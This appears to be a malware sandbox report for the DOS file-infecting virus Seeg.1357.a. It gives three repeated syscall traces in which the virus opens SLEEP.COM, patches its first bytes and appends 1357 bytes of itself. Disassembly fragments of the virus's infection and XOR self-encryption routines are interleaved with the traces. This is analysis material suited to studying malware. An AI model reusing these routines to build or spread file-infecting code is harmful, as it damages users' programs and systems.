Sample viewer

vx.netlux.org/Virus.DOS.Seeg.1357.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:25:10.73645848Z 53 PC: 12e3c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:25:10.73846879Z 37 PC: 12e4f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:25:10.739603185Z 73 PC: 12c81 | Release memory
2018-12-17T22:25:10.741281885Z 72 PC: 12c8e | Allocate memory
2018-12-17T22:25:10.747935539Z 74 PC: 12c9b | Reallocate memory
2018-12-17T22:25:10.749380359Z 72 PC: 12ca3 | Allocate memory
2018-12-17T22:25:10.751122424Z 44 PC: 12cbb | Get time 0x12cbb: cmp dh, 0x22
0x12cbe: jne 0x12cc3
0x12cc0: call 0x12ddc
0x12cc3: call 0x12f02
0x12cc6: lea si, word ptr [bp + 0x2a7]
0x12cca: mov ax, dx
0x12ccc: xor bx, bx
0x12cce: call 0x12e06
0x12cd1: xor ax, 0x1234
0x12cd4: call 0x12e06
0x12cd7: mov ax, word ptr [si]
0x12cd9: xor ah, ah
0x12cdb: mov bl, 2
0x12cdd: div bl
0x12cdf: xor ah, ah
0x12ce1: mov byte ptr [bp + 0x2b6], al
0x12ce5: push si
0x12ce6: lea si, word ptr [bp + 0x249]
0x12cea: call 0x12e7d
0x12ced: pop si
2018-12-17T22:25:10.753710186Z 9 PC: 12de5 | Display string (Could not find end pointer)
2018-12-17T22:25:10.760376746Z 26 PC: 12f23 | Set disk transfer address
2018-12-17T22:25:10.761810154Z 78 PC: 12f2f | Find first file
2018-12-17T22:25:10.768053315Z 67 PC: 12f9a | Get or set file attributes
2018-12-17T22:25:10.784759149Z 61 PC: 12fab | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:25:10.795408408Z 66 PC: 12fbd | Move file pointer
2018-12-17T22:25:10.797074273Z 63 PC: 12fc8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:25:10.804572167Z 66 PC: 12ff3 | Move file pointer
2018-12-17T22:25:10.806067377Z 64 PC: 12fff | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:25:10.808686898Z 66 PC: 13009 | Move file pointer
2018-12-17T22:25:10.811170913Z 44 PC: 1300d | Get time 0x1300d: push ds
0x1300e: mov cx, 0x2a6
0x13011: mov si, 0x41
0x13014: mov word ptr es:[0x23], dx
0x13019: xor word ptr es:[si], dx
0x1301c: inc si
0x1301d: sub dx, 0xdead
0x13021: inc si
0x13022: loop 0x13019
0x13024: push bx
0x13025: xor ax, ax
0x13027: mov al, byte ptr [bp + 0x2b7]
0x1302b: mov bl, 3
0x1302d: mul bl
0x1302f: add ax, 3
0x13032: mov word ptr [bp + 0x2b8], ax
0x13036: lea si, word ptr [bp + 0x261]
0x1303a: xor di, di
0x1303c: movsb byte ptr es:[di], byte ptr [si]
0x1303d: mov bx, word ptr [bp + 0x233]
2018-12-17T22:25:10.814360379Z 64 PC: 130a5 | Write file or device (Write 13 bytes on handle 5)
2018-12-17T22:25:10.817422019Z 64 PC: 130b0 | Write file or device (Write 1357 bytes on handle 5)
2018-12-17T22:25:10.827951425Z 87 PC: 130c6 | Get or set file date and time
2018-12-17T22:25:10.829732877Z 62 PC: 130ca | Close file
2018-12-17T22:25:10.842117352Z 37 PC: 12e33 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:25:10.852816212Z 73 PC: 130d3 | Release memory
2018-12-17T22:25:10.854616862Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4450,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:52.585930286Z 53 PC: 12e3c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.587704346Z 37 PC: 12e4f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.589659353Z 73 PC: 12c81 | Release memory
2018-12-25T11:51:52.590947494Z 72 PC: 12c8e | Allocate memory
2018-12-25T11:51:52.593050471Z 74 PC: 12c9b | Reallocate memory
2018-12-25T11:51:52.594529054Z 72 PC: 12ca3 | Allocate memory
2018-12-25T11:51:52.596070262Z 44 PC: 12cbb | Get time 0x12cbb: cmp dh, 0x22
0x12cbe: jne 0x12cc3
0x12cc0: call 0x12ddc
0x12cc3: call 0x12f02
0x12cc6: lea si, word ptr [bp + 0x2a7]
0x12cca: mov ax, dx
0x12ccc: xor bx, bx
0x12cce: call 0x12e06
0x12cd1: xor ax, 0x1234
0x12cd4: call 0x12e06
0x12cd7: mov ax, word ptr [si]
0x12cd9: xor ah, ah
0x12cdb: mov bl, 2
0x12cdd: div bl
0x12cdf: xor ah, ah
0x12ce1: mov byte ptr [bp + 0x2b6], al
0x12ce5: push si
0x12ce6: lea si, word ptr [bp + 0x249]
0x12cea: call 0x12e7d
0x12ced: pop si
2018-12-25T11:51:52.598917385Z 26 PC: 12f23 | Set disk transfer address
2018-12-25T11:51:52.60003804Z 78 PC: 12f2f | Find first file
2018-12-25T11:51:52.606356955Z 67 PC: 12f9a | Get or set file attributes
2018-12-25T11:51:52.623446993Z 61 PC: 12fab | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:52.630735267Z 66 PC: 12fbd | Move file pointer
2018-12-25T11:51:52.632108427Z 63 PC: 12fc8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:52.639098846Z 66 PC: 12ff3 | Move file pointer
2018-12-25T11:51:52.641069345Z 64 PC: 12fff | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:52.643807006Z 66 PC: 13009 | Move file pointer
2018-12-25T11:51:52.645186837Z 44 PC: 1300d | Get time 0x1300d: push ds
0x1300e: mov cx, 0x2a6
0x13011: mov si, 0x41
0x13014: mov word ptr es:[0x23], dx
0x13019: xor word ptr es:[si], dx
0x1301c: inc si
0x1301d: sub dx, 0xdead
0x13021: inc si
0x13022: loop 0x13019
0x13024: push bx
0x13025: xor ax, ax
0x13027: mov al, byte ptr [bp + 0x2b7]
0x1302b: mov bl, 3
0x1302d: mul bl
0x1302f: add ax, 3
0x13032: mov word ptr [bp + 0x2b8], ax
0x13036: lea si, word ptr [bp + 0x261]
0x1303a: xor di, di
0x1303c: movsb byte ptr es:[di], byte ptr [si]
0x1303d: mov bx, word ptr [bp + 0x233]
2018-12-25T11:51:52.650011001Z 64 PC: 130a5 | Write file or device (Write 25 bytes on handle 5)
2018-12-25T11:51:52.652840807Z 64 PC: 130b0 | Write file or device (Write 1357 bytes on handle 5)
2018-12-25T11:51:52.66253211Z 87 PC: 130c6 | Get or set file date and time
2018-12-25T11:51:52.664285165Z 62 PC: 130ca | Close file
2018-12-25T11:51:52.672576774Z 37 PC: 12e33 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.674047876Z 73 PC: 130d3 | Release memory
2018-12-25T11:51:52.67548121Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":34,"TimeBased":true,"OriginalID":4450,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:52.623820977Z 53 PC: 12e3c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.625423295Z 37 PC: 12e4f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.626539462Z 73 PC: 12c81 | Release memory
2018-12-25T11:51:52.627890823Z 72 PC: 12c8e | Allocate memory
2018-12-25T11:51:52.629951888Z 74 PC: 12c9b | Reallocate memory
2018-12-25T11:51:52.631396504Z 72 PC: 12ca3 | Allocate memory
2018-12-25T11:51:52.633148505Z 44 PC: 12cbb | Get time 0x12cbb: cmp dh, 0x22
0x12cbe: jne 0x12cc3
0x12cc0: call 0x12ddc
0x12cc3: call 0x12f02
0x12cc6: lea si, word ptr [bp + 0x2a7]
0x12cca: mov ax, dx
0x12ccc: xor bx, bx
0x12cce: call 0x12e06
0x12cd1: xor ax, 0x1234
0x12cd4: call 0x12e06
0x12cd7: mov ax, word ptr [si]
0x12cd9: xor ah, ah
0x12cdb: mov bl, 2
0x12cdd: div bl
0x12cdf: xor ah, ah
0x12ce1: mov byte ptr [bp + 0x2b6], al
0x12ce5: push si
0x12ce6: lea si, word ptr [bp + 0x249]
0x12cea: call 0x12e7d
0x12ced: pop si
2018-12-25T11:51:52.63599271Z 26 PC: 12f23 | Set disk transfer address
2018-12-25T11:51:52.637491435Z 78 PC: 12f2f | Find first file
2018-12-25T11:51:52.6440933Z 67 PC: 12f9a | Get or set file attributes
2018-12-25T11:51:52.661246952Z 61 PC: 12fab | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:52.668568258Z 66 PC: 12fbd | Move file pointer
2018-12-25T11:51:52.669528874Z 63 PC: 12fc8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:52.6741078Z 66 PC: 12ff3 | Move file pointer
2018-12-25T11:51:52.67548683Z 64 PC: 12fff | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:52.677309574Z 66 PC: 13009 | Move file pointer
2018-12-25T11:51:52.678303391Z 44 PC: 1300d | Get time 0x1300d: push ds
0x1300e: mov cx, 0x2a6
0x13011: mov si, 0x41
0x13014: mov word ptr es:[0x23], dx
0x13019: xor word ptr es:[si], dx
0x1301c: inc si
0x1301d: sub dx, 0xdead
0x13021: inc si
0x13022: loop 0x13019
0x13024: push bx
0x13025: xor ax, ax
0x13027: mov al, byte ptr [bp + 0x2b7]
0x1302b: mov bl, 3
0x1302d: mul bl
0x1302f: add ax, 3
0x13032: mov word ptr [bp + 0x2b8], ax
0x13036: lea si, word ptr [bp + 0x261]
0x1303a: xor di, di
0x1303c: movsb byte ptr es:[di], byte ptr [si]
0x1303d: mov bx, word ptr [bp + 0x233]
2018-12-25T11:51:52.681045994Z 64 PC: 130a5 | Write file or device (Write 16 bytes on handle 5)
2018-12-25T11:51:52.682892842Z 64 PC: 130b0 | Write file or device (Write 1357 bytes on handle 5)
2018-12-25T11:51:52.695153375Z 87 PC: 130c6 | Get or set file date and time
2018-12-25T11:51:52.696875479Z 62 PC: 130ca | Close file
2018-12-25T11:51:52.70511912Z 37 PC: 12e33 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:51:52.706272675Z 73 PC: 130d3 | Release memory
2018-12-25T11:51:52.708447289Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')